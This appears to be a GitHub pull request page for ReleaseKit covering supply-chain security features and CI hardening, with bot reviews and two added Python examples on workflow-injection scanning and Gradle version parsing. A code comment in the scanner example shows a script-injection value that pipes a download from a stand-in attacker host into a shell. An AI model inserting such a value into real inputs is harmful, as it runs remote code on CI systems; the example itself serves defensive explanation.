feat(releasekit): supply-chain security, multi-ecosystem orchestration, and CI hardening #4682

Merged
yesudeep merged 1 commit into main from yesudeep/fix/kindly-patch on Feb 16, 2026

Conversation

@yesudeep (Contributor)

@yesudeep yesudeep commented Feb 15, 2026

feat(releasekit): supply-chain security, multi-ecosystem orchestration, and CI hardening

This PR transforms ReleaseKit from a Python-focused publish tool into a
comprehensive, multi-ecosystem release orchestrator with full supply-chain
security capabilities.

All ${{ inputs.* }} interpolation in CI workflow run: blocks is replaced
with env: var indirection to prevent GitHub Actions script injection (a
Critical-severity vulnerability). New modules add SLSA v1.0 provenance
generation, Sigstore keyless signing, PEP 740 attestations, CycloneDX/SPDX
SBOM generation, OSV vulnerability scanning, OpenSSF Scorecard integration,
and configurable trust/approval gates.

CI & Security Hardening

  • Replace inline ${{ inputs.* }} with env vars in all workflow run: blocks
  • Add provenance.py for SLSA v1.0 provenance attestations
  • Add attestations: write permission and SBOM upload steps
  • Add osv.py for OSV.dev vulnerability scanning
  • Add security_insights.py for SECURITY-INSIGHTS.yml (OpenSSF standard)
  • Add scorecard.py for OpenSSF Scorecard integration
  • Add trust.py for configurable trust/approval gates
  • Add security checks 12-14 in rk_security_test.py

New Modules

  • announce.py: post-release notifications (Slack, Discord, repo dispatch)
  • api.py: programmatic Python API for ReleaseKit operations
  • attestations.py: artifact attestation generation and verification
  • calver.py: calendar versioning (CalVer) support
  • changesets.py: changeset-based versioning
  • channels.py: release channels (stable, beta, nightly, canary)
  • compliance.py: license compliance and policy enforcement
  • hooks.py: lifecycle hooks (pre/post publish, prepare, release)
  • hotfix.py: hotfix workflow for cherry-pick releases
  • prerelease.py: prerelease version management (rc, beta, alpha)
  • should_release.py: smart release gating (commit analysis, path filtering)
  • snapshot.py: snapshot/dev version publishing
  • commit_parsing/_angular.py: Angular commit convention parser

Validation Backend (backends/validation/)

  • attestation.py, jwks.py, oidc.py, provenance.py, runner.py
  • sbom.py, schema.py, slsa.py

Reusable Composite Action

  • action.yml rewritten as universal composite GitHub Action
  • All inputs passed via env vars (injection-safe)
  • Structured outputs: exit code, release URL, PR URL, first tag, plan JSON
  • Job Summary with rollback links
  • Template workflows simplified to use the composite action

Documentation

  • 20+ new guides (rollback, snapshots, SLSA, hooks, hotfix, channels, etc.)
  • Roadmap moved and expanded
  • CLI reference expanded with new commands
  • New commit-formats.md and Reveal.js presentation

Other Changes

  • py/pyproject.toml: PEP 8 inline comment spacing fix
  • py/bin/fix_inline_imports.py: new AST-based fixer script
  • py/GEMINI.md, releasekit/GEMINI.md: added security checks 12-14
  • cli.py: _cmd_check converted to async; ~1000 lines of new CLI commands
  • go.py, maven.py: enhanced for multi-ecosystem support
  • New releasekit-rollback.yml template workflow
  • framework-custom-evaluators LICENSE file added

Testing

  • 30+ new test files covering all new modules
  • All 16 security tests pass
  • Linting and formatting pass
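
The env-var indirection the description above relies on, as an added example that is neither ReleaseKit's code nor part of this PR: a small Python scanner that flags any `${{ ... }}` expression appearing inside a `run:` script, run against a constructed vulnerable workflow and its hardened counterpart. The scanner is line-oriented (it handles inline `run:` values and `|`/`>` block scalars, not flow-style YAML), and it is deliberately stricter than the PR's wording, reporting every expression in a script rather than only `inputs.*`, because `github.event.*` fields such as a PR title or branch name are the classic injection source. The two workflow snippets, the `Finding` type and the function names are assumptions of the example.

```python
"""Flag `${{ ... }}` expressions interpolated into GitHub Actions `run:` scripts."""
from __future__ import annotations

import re
from dataclasses import dataclass

# A `run:` key, optionally as a sequence item (`- run:`). The value is either
# an inline script or a block-scalar indicator such as `|`, `|-` or `>`.
_RUN_RE = re.compile(r"^(?P<indent>[ \t]*)(?P<dash>-[ \t]+)?run:[ \t]*(?P<value>.*)$")
# An Actions expression. The runner substitutes it textually before the shell
# starts, so inside a script the expanded value is executed as shell code.
_EXPR_RE = re.compile(r"\$\{\{\s*(?P<expr>.+?)\s*\}\}")

# Constructed sample (not from the PR): `inputs.version` lands in the shell as
# code. A value such as   1.0"; curl https://attacker.example/x | sh; echo "
# would run the pipeline before `git tag` ever sees a version string.
VULNERABLE_WORKFLOW = """\
name: release
on:
  workflow_dispatch:
    inputs:
      version:
        required: true
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Releasing ${{ inputs.version }}"
      - name: tag
        run: |
          git tag "v${{ inputs.version }}"
          git push origin "v${{ inputs.version }}"
"""

# Constructed sample of the hardened form: the expression is evaluated into an
# environment variable and the script reads it as data via `$RELEASE_VERSION`.
HARDENED_WORKFLOW = """\
name: release
on:
  workflow_dispatch:
    inputs:
      version:
        required: true
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Releasing $RELEASE_VERSION"
        env:
          RELEASE_VERSION: ${{ inputs.version }}
      - name: tag
        env:
          RELEASE_VERSION: ${{ inputs.version }}
        run: |
          git tag "v$RELEASE_VERSION"
          git push origin "v$RELEASE_VERSION"
"""


@dataclass(frozen=True)
class Finding:
    line: int        # 1-based line in the workflow file
    expression: str  # expression text without the `${{ }}` wrapper


def _indent(line: str) -> int:
    return len(line) - len(line.lstrip(" \t"))


def _run_script_lines(workflow_text: str):
    """Yield (line_no, text) for every line that is part of a run: script."""
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = _RUN_RE.match(lines[i])
        if m is None:
            i += 1
            continue
        value = m.group("value").strip()
        if value.startswith(("|", ">")):
            # Block scalar: every following line indented deeper than the `run`
            # key (blank lines included) belongs to the script.
            key_col = len(m.group("indent")) + len(m.group("dash") or "")
            i += 1
            while i < len(lines) and (not lines[i].strip() or _indent(lines[i]) > key_col):
                yield i + 1, lines[i]
                i += 1
        else:
            yield i + 1, value
            i += 1


def scan(workflow_text: str) -> list[Finding]:
    """Return every expression found inside a run: script, in file order."""
    return [
        Finding(line_no, m.group("expr"))
        for line_no, text in _run_script_lines(workflow_text)
        for m in _EXPR_RE.finditer(text)
    ]


def is_injection_safe(workflow_text: str) -> bool:
    """True when no run: script interpolates an expression directly."""
    return not scan(workflow_text)


if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        findings = scan(text)
        print(f"{name}: {len(findings)} finding(s)")
        for f in findings:
            print(f"  line {f.line}: ${{{{ {f.expression} }}}}")
```

Running the file prints three findings for the vulnerable sample (lines 11, 14 and 15) and none for the hardened one. The policy the scanner enforces is the one the PR adopts: an expression may be evaluated under `env:`, where the runner stores the result in a variable, but never inside the script text, so the shell only ever sees `$RELEASE_VERSION` and treats its contents as data. Quoting the variable (`"v$RELEASE_VERSION"`) is still required to stop word splitting and globbing, which is why the hardened sample quotes every use.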

@gemini-code-assist (Contributor)

Summary of Changes

Hello @yesudeep, I'm Gemini Code Assist! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed!

This pull request significantly enhances releasekit's ability to manage versions within Gradle-based projects by introducing support for gradle.properties and Gradle Version Catalogs. It also expands the tool's ecosystem compatibility to include Bazel and other JVM-related languages, making the continuous release process more comprehensive and reliable across a wider variety of project types.

Highlights

  • Enhanced Gradle Version Management: Implemented new logic to read and write versions from gradle.properties (using VERSION_NAME) and Gradle Version Catalogs (libs.versions.toml), providing more robust version discovery and rewriting capabilities for Gradle projects.
  • Improved Gradle Regex Parsing: Refined regular expressions for parsing Gradle versions, groups, and settings.gradle include directives, including support for Kotlin DSL and multi-include statements.
  • Expanded Ecosystem Support: Added 'bazel' as a supported ecosystem and extended the MavenWorkspace backend to handle 'clojure', 'jvm', and 'kotlin' projects, broadening the range of projects releasekit can manage.
  • New Gradle-Specific Tests: Introduced a dedicated test file (rk_workspace_gradle_test.py) to thoroughly validate the new Gradle version parsing and rewriting functionalities.

Changelog
  • py/tools/releasekit/src/releasekit/backends/workspace/maven.py
    • Modified _GRADLE_VERSION_RE and _GRADLE_GROUP_RE regex to exclude whitespace from captured version/group strings.
    • Added _GRADLE_PROPS_VERSION_RE regex for parsing VERSION_NAME from gradle.properties.
    • Updated _SETTINGS_INCLUDE_RE regex to more broadly match project paths in settings.gradle files, supporting Kotlin DSL and multi-includes.
    • Introduced _read_gradle_properties_version and _write_gradle_properties_version functions for gradle.properties.
    • Added _read_version_catalog_version and _write_version_catalog_version functions for libs.versions.toml.
    • Updated _discover_gradle to fall back to gradle.properties and libs.versions.toml for version discovery if not found in build.gradle.
    • Modified rewrite_version to support version rewriting in gradle.properties and libs.versions.toml files.
  • py/tools/releasekit/src/releasekit/config.py
    • Added 'bazel' to the list of ALLOWED_ECOSYSTEMS.
    • Added 'bazel' with 'bazel' as its default tool to DEFAULT_TOOLS.
  • py/tools/releasekit/src/releasekit/workspace.py
    • Imported BazelWorkspace backend.
    • Updated the _ws_type type hint to include BazelWorkspace.
    • Expanded backend_map to include BazelWorkspace for 'bazel' and map 'clojure', 'jvm', and 'kotlin' to MavenWorkspace.
    • Updated discover_packages to include 'jvm', 'kotlin', 'clojure', and 'bazel' in the list of ecosystems handled by _discover_via_backend.
  • py/tools/releasekit/tests/backends/rk_workspace_gradle_test.py
    • Added a new test file to cover Gradle-specific version handling, including gradle.properties and version catalogs.
    • Included tests for reading and writing versions in gradle.properties.
    • Added tests for reading and writing versions in libs.versions.toml (version catalog).
    • Implemented tests for parsing settings.gradle.kts with Kotlin DSL and multi-include syntax.
    • Provided tests for MavenWorkspace.discover() functionality with gradle.properties and version catalogs.
    • Added tests for MavenWorkspace.rewrite_version() with gradle.properties and version catalogs.
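
An added example (not ReleaseKit's code; the PR's own implementation lives in maven.py and is not reproduced on this page) of the two parsing tasks the summary above lists, written so that commented-out lines are ignored, which is the robustness point the first review raises: reading and rewriting VERSION_NAME in gradle.properties, and collecting project paths from Groovy and Kotlin DSL include directives, including multi-line argument lists. A rewriter that matched a commented-out `# VERSION_NAME=0.9.0` would tag and publish the wrong version, so the comment handling is the part worth getting right. The sample file contents and the function names are constructed for this example.

```python
"""Version discovery in gradle.properties and settings.gradle(.kts), comment-safe."""
from __future__ import annotations

import re

# One property: optional leading whitespace, key, `=` or `:` separator, value.
# Lines whose first non-blank character is `#` or `!` are comments in Java
# .properties files and are skipped before this pattern is applied.
_PROP_RE = re.compile(
    r"^(?P<lead>[ \t]*)(?P<key>[^#!=:\s][^=:\s]*)[ \t]*[=:][ \t]*(?P<value>.*?)[ \t]*$"
)
# Groovy `include ':a', ':b'` and Kotlin DSL `include(":a", ":b")`, including
# multi-line argument lists; a line-leading `//` comment never matches.
_INCLUDE_RE = re.compile(
    r"^[ \t]*include[ \t]*\(?\s*(?P<args>(?:['\"][^'\"]+['\"]\s*,?\s*)+)\)?", re.MULTILINE
)
_QUOTED_RE = re.compile(r"['\"]([^'\"]+)['\"]")

# Constructed samples. The commented-out VERSION_NAME is the trap: a regex that
# ignores comment markers would report 0.9.0 instead of 1.2.3.
GRADLE_PROPERTIES = """\
# VERSION_NAME=0.9.0   (stale, commented out)
org.gradle.jvmargs=-Xmx2g
VERSION_NAME = 1.2.3
GROUP=com.example
"""
SETTINGS_KTS = """\
rootProject.name = "demo"
// include(":old-module")
include(":app", ":lib")
include(
    ":tools",
)
"""


def _is_comment(line: str) -> bool:
    stripped = line.strip()
    return not stripped or stripped[0] in "#!"


def read_properties_version(text: str, key: str = "VERSION_NAME") -> str | None:
    """Return the value of `key`, or None if no live (uncommented) line sets it."""
    for line in text.splitlines():
        if _is_comment(line):
            continue
        m = _PROP_RE.match(line)
        if m and m.group("key") == key:
            return m.group("value")
    return None


def write_properties_version(text: str, new_version: str, key: str = "VERSION_NAME") -> str:
    """Rewrite the first live `key` line to `key=new_version`; keep every other
    line byte-for-byte (comments included); append the property if absent."""
    out: list[str] = []
    replaced = False
    for line in text.splitlines(keepends=True):
        body = line.rstrip("\r\n")
        eol = line[len(body):]
        m = None if (replaced or _is_comment(body)) else _PROP_RE.match(body)
        if m and m.group("key") == key:
            line = f"{m.group('lead')}{key}={new_version}{eol}"
            replaced = True
        out.append(line)
    if not replaced:
        if out and not out[-1].endswith("\n"):
            out[-1] += "\n"
        out.append(f"{key}={new_version}\n")
    return "".join(out)


def parse_settings_includes(text: str) -> list[str]:
    """Return project paths from every `include` directive, in file order."""
    paths: list[str] = []
    for m in _INCLUDE_RE.finditer(text):
        paths.extend(_QUOTED_RE.findall(m.group("args")))
    return paths


if __name__ == "__main__":
    print(read_properties_version(GRADLE_PROPERTIES))
    print(write_properties_version(GRADLE_PROPERTIES, "1.3.0"), end="")
    print(parse_settings_includes(SETTINGS_KTS))
```

The rewriter normalises the separator to `=` on the one line it touches and leaves everything else, including the stale commented-out line, untouched, so a diff of the rewrite shows exactly one changed line. `includeBuild(...)` is deliberately not matched, since composite builds are not subprojects.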

@yesudeep marked this pull request as draft on February 15, 2026 15:47
@yesudeep force-pushed the yesudeep/fix/kindly-patch branch from 4854508 to 4b117b9 on February 15, 2026 15:47
@gemini-code-assist (bot) left a comment

Code Review

This pull request enhances the release kit by adding support for continuous releases, particularly for Gradle projects. The changes include more robust version parsing from various Gradle files like gradle.properties and libs.versions.toml, and improved discovery of Gradle projects. Additionally, support for Bazel has been initiated. The new test file for Gradle-specific features is comprehensive and well-written. My review includes a few suggestions to improve the robustness of file parsing by using a dedicated library (tomlkit) for TOML files and by making regex patterns more resilient to comments in property files. These changes will help prevent potential bugs with different but valid file formats.

@yesudeep force-pushed the yesudeep/fix/kindly-patch branch from 4b117b9 to 693c9bd on February 15, 2026 20:46
@github-actions bot added the docs (Improvements or additions to documentation) label on Feb 15, 2026
@yesudeep force-pushed the yesudeep/fix/kindly-patch branch 4 times, most recently from 5c7950f to 2558f7d, on February 15, 2026 22:10
@yesudeep force-pushed the yesudeep/fix/kindly-patch branch 12 times, most recently from 014dfdb to 3f862d8, on February 16, 2026 01:49
@yesudeep force-pushed the yesudeep/fix/kindly-patch branch 2 times, most recently from f52d0b9 to cd8d1dc, on February 16, 2026 07:41
@github-actions bot added the root label on Feb 16, 2026
@yesudeep force-pushed the yesudeep/fix/kindly-patch branch 3 times, most recently from edf06de to 66e221c, on February 16, 2026 07:46
@yesudeep (Contributor, Author)

/gemini review

@gemini-code-assist (bot) left a comment

Code Review

This is an impressive and extensive pull request that significantly enhances releasekit with a wide range of features for continuous releases, security, and multi-ecosystem support. The introduction of a programmatic API, a comprehensive validation framework, and support for changesets, CalVer, and release channels are all excellent additions. The refactoring of the GitHub Actions workflows to use a reusable composite action is a major improvement for maintainability and usability. The code is well-structured and the new documentation is thorough.

I have one critical security concern regarding command argument injection in a new utility script, and a minor comment about a misleading code comment. Other than that, the changes look solid.

@yesudeep force-pushed the yesudeep/fix/kindly-patch branch 4 times, most recently from 1adc44a to fa2a3e7, on February 16, 2026 08:28
@yesudeep (Contributor, Author)

/gemini review

@gemini-code-assist (bot) left a comment

Code Review

This is a massive and impressive pull request that transforms releasekit into a comprehensive, multi-ecosystem release orchestration tool. The changes introduce a wide array of features for continuous releases, security compliance (SLSA, Sigstore, SBOMs), and operational robustness, including one-click rollbacks and detailed health checks. The addition of extensive documentation, a programmatic API, and a reusable GitHub Action are all excellent improvements. The overall quality of the code is very high. I have only found a couple of minor issues to address.

@yesudeep force-pushed the yesudeep/fix/kindly-patch branch from fa2a3e7 to fc2ec70 on February 16, 2026 08:35
@yesudeep changed the title from "fix(releasekit): continuous releases" to "feat(releasekit): supply-chain security, multi-ecosystem orchestration, and CI hardening" on Feb 16, 2026
@yesudeep marked this pull request as ready for review on February 16, 2026 08:43
@yesudeep enabled auto-merge (squash) on February 16, 2026 08:43
@yesudeep disabled auto-merge on February 16, 2026 08:44
@yesudeep force-pushed the yesudeep/fix/kindly-patch branch from fc2ec70 to ed5dfb9 on February 16, 2026 09:41
@yesudeep (Contributor, Author)

/gemini review

@gemini-code-assist (bot) left a comment

Code Review

This is a massive and impressive PR that transforms ReleaseKit into a full-featured, multi-ecosystem release orchestrator with strong supply-chain security capabilities. The changes are well-structured, and the new features are extensively documented. The use of a composite action simplifies CI workflows significantly. My review focuses on a couple of minor improvements in the CI workflow implementation for better robustness and maintainability.

Rationale: This PR adds continuous release infrastructure to releasekit,
including provenance generation, security insights, attestations,
compliance checks, and scheduler functionality.

Changes:
- Add SLSA provenance generation (provenance.py)
- Add security insights YAML generation (security_insights.py)
- Add attestation verification backends
- Add compliance and preflight checks
- Add release scheduler with cron support
- Add inline import fixer script (bin/fix_inline_imports.py)
- Fix ty type errors: guard ast end_lineno (can be None)
- Fix F811: remove redundant has_oidc_credential import
- Fix lazy yaml import for proper JSON fallback path
- Add noqa comments for intentional subprocess usage in fixer scripts
@yesudeep force-pushed the yesudeep/fix/kindly-patch branch from ed5dfb9 to 10d02c1 on February 16, 2026 09:47
@yesudeep enabled auto-merge (squash) on February 16, 2026 09:47
@yesudeep merged commit 29d3ec1 into main on Feb 16, 2026
25 checks passed
@yesudeep deleted the yesudeep/fix/kindly-patch branch on February 16, 2026 10:00
Labels: config, docs (Improvements or additions to documentation), fix, python, root

Projects: Status: Done

2 participants